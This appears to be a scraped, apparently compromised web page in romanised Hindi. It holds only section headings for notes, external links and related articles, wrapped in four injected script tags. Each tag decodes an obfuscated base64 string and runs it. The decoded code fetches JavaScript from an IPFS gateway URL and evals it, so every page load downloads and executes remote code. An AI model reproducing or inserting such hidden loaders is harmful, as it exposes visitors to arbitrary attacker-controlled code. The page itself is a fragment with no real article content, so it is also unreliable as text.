<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>